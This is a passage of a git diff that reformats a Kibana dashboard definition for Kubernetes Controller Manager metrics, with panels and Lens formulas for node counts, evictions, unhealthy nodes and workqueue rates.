"93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:a21b3215-31e2-4ab3-b313-8fc7e77bed39", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:87c6048e-20a6-401c-bf42-72ae034ee2fa", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:3b897101-bd76-444d-859e-60916d19dc02", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:029a2917-cecd-4656-8c48-2ca1f66fcadd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_57552b73-992a-46e6-9f21-9e07ca926a83:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_6c029002-b266-42ef-af36-fdcd73bfadef:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json b/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json index c4ecb49574f..a8f632aa1f8 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json @@ -1,3187 +1,3209 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1MiwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Kubernetes Controller Manager metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.controllermanager" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": { + "query": "kubernetes.controllermanager" + } + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": true, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 10, + "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "w": 23, + "x": 0, + "y": 0 + }, + "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Controller Manager\n\nThis dashboard collects metrics from [kube controller manager](https://kubernetes.io/docs/concepts/overview/components/#kube-controller-manager) endpoint. Its purpose is to give an overview of what is happening inside it through the controller processes metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the kube controller manager endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "w": 25, + "x": 23, + "y": 0 }, - "description": "Kubernetes Controller Manager metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ + "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(203,228,249,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Cluster nodes", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ { - "$state": { - "store": "appState" + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "aef813b5-85d5-46c9-a86a-2e273806d488", + "w": 25, + "x": 23, + "y": 3 + }, + "panelIndex": "aef813b5-85d5-46c9-a86a-2e273806d488", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "239b73ac-0fc9-44fd-a7c5-2d0281e6b765": { + "columnOrder": [ + "310bfe34-31c8-4c52-bff0-60450318be7e", + "28f81466-455c-469d-8c35-b53555ae5e8a", + "363b1795-4ab4-43e8-87a6-fafe691bddf2", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", + "6b1f578b-3e83-443b-a2da-b97ecbcd67bb", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", + "363b1795-4ab4-43e8-87a6-fafe691bddf2X0", + "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" + ], + "columns": { + "28f81466-455c-469d-8c35-b53555ae5e8a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Zone", + "operationType": "terms", + "params": { + "missingBucket": true, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.zone" + }, + "310bfe34-31c8-4c52-bff0-60450318be7e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "orchestrator.cluster.name" + }, + "363b1795-4ab4-43e8-87a6-fafe691bddf2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total nodes", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.count: *')", + "isFormulaBroken": false + }, + "references": [ + "363b1795-4ab4-43e8-87a6-fafe691bddf2X0" + ], + "scale": "ratio" + }, + "363b1795-4ab4-43e8-87a6-fafe691bddf2X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.count: *" + }, + "isBucketed": false, + "label": "Part of Total nodes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.node.collector.count" }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.controllermanager" + "6b1f578b-3e83-443b-a2da-b97ecbcd67bb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Node evictions", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.controllermanager.node.collector.eviction.count, kql='kubernetes.controllermanager.node.collector.eviction.count: *')", + "isFormulaBroken": false + }, + "references": [ + "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" + ], + "scale": "ratio" + }, + "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.eviction.count: *" + }, + "isBucketed": false, + "label": "Part of Node evictions", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.node.collector.eviction.count" + }, + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unhealthy nodes", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } }, - "type": "phrase" + "formula": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", + "isFormulaBroken": false + }, + "references": [ + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2" + ], + "scale": "ratio" + }, + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" + }, + "isBucketed": false, + "label": "Part of Unhealthy nodes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.node.collector.unhealthy.count" }, - "query": { - "match_phrase": { - "data_stream.dataset": { - "query": "kubernetes.controllermanager" - } + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" + }, + "isBucketed": false, + "label": "Part of Unhealthy nodes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.node.collector.count" + }, + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Unhealthy nodes", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" + ], + "name": "divide", + "type": "function" + }, + 100 + ], + "location": { + "max": 277, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", + "type": "function" } + }, + "references": [ + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" + ], + "scale": "ratio" } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "310bfe34-31c8-4c52-bff0-60450318be7e", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "28f81466-455c-469d-8c35-b53555ae5e8a", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "363b1795-4ab4-43e8-87a6-fafe691bddf2", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", + "isTransposed": false + }, + { + "columnId": "6b1f578b-3e83-443b-a2da-b97ecbcd67bb", + "isTransposed": false + } ], + "layerId": "239b73ac-0fc9-44fd-a7c5-2d0281e6b765", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Node collector" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "w": 48, + "x": 0, + "y": 10 + }, + "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(205,245,246,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Workqueue", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": true, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "w": 24, + "x": 0, + "y": 13 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3ed2b7d8-6b77-43b7-8ed3-c52117016d59", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { + "columnOrder": [ + "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + "4266ba8e-3786-4162-9140-15f600580db0", + "5b2495ee-2297-4e20-81d3-ac385205cb01", + "5b2495ee-2297-4e20-81d3-ac385205cb01X1", + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "columns": { + "4266ba8e-3786-4162-9140-15f600580db0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Controller Manager\n\nThis dashboard collects metrics from [kube controller manager](https://kubernetes.io/docs/concepts/overview/components/#kube-controller-manager) endpoint. Its purpose is to give an overview of what is happening inside it through the controller processes metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the kube controller manager endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", - "openLinksInNewTab": false + "5b2495ee-2297-4e20-81d3-ac385205cb01": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Counter rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.adds.count))", + "isFormulaBroken": false + }, + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 10, - "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "w": 23, - "x": 0, - "y": 0 - }, - "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.workqueue.adds.count: *" + }, + "isBucketed": false, + "label": "Part of Counter rate", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.adds.count" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(203,228,249,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Cluster nodes", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Counter rate", + "operationType": "counter_rate", + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "metrics", - "uiState": {} + "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Workqueues", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "w": 25, - "x": 23, - "y": 0 + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01" + ], + "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "239b73ac-0fc9-44fd-a7c5-2d0281e6b765": { - "columnOrder": [ - "310bfe34-31c8-4c52-bff0-60450318be7e", - "28f81466-455c-469d-8c35-b53555ae5e8a", - "363b1795-4ab4-43e8-87a6-fafe691bddf2", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", - "6b1f578b-3e83-443b-a2da-b97ecbcd67bb", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1", - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", - "363b1795-4ab4-43e8-87a6-fafe691bddf2X0", - "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" - ], - "columns": { - "28f81466-455c-469d-8c35-b53555ae5e8a": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Zone", - "operationType": "terms", - "params": { - "missingBucket": true, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.zone" - }, - "310bfe34-31c8-4c52-bff0-60450318be7e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "orchestrator.cluster.name" - }, - "363b1795-4ab4-43e8-87a6-fafe691bddf2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total nodes", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.count: *')", - "isFormulaBroken": false - }, - "references": [ - "363b1795-4ab4-43e8-87a6-fafe691bddf2X0" - ], - "scale": "ratio" - }, - "363b1795-4ab4-43e8-87a6-fafe691bddf2X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.count: *" - }, - "isBucketed": false, - "label": "Part of Total nodes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.count" - }, - "6b1f578b-3e83-443b-a2da-b97ecbcd67bb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Node evictions", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.controllermanager.node.collector.eviction.count, kql='kubernetes.controllermanager.node.collector.eviction.count: *')", - "isFormulaBroken": false - }, - "references": [ - "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" - ], - "scale": "ratio" - }, - "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.eviction.count: *" - }, - "isBucketed": false, - "label": "Part of Node evictions", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.eviction.count" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Unhealthy nodes", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", - "isFormulaBroken": false - }, - "references": [ - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2" - ], - "scale": "ratio" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" - }, - "isBucketed": false, - "label": "Part of Unhealthy nodes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.node.collector.unhealthy.count" - }, - "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1": { - "customLabel": true, - "dataType": "number", - 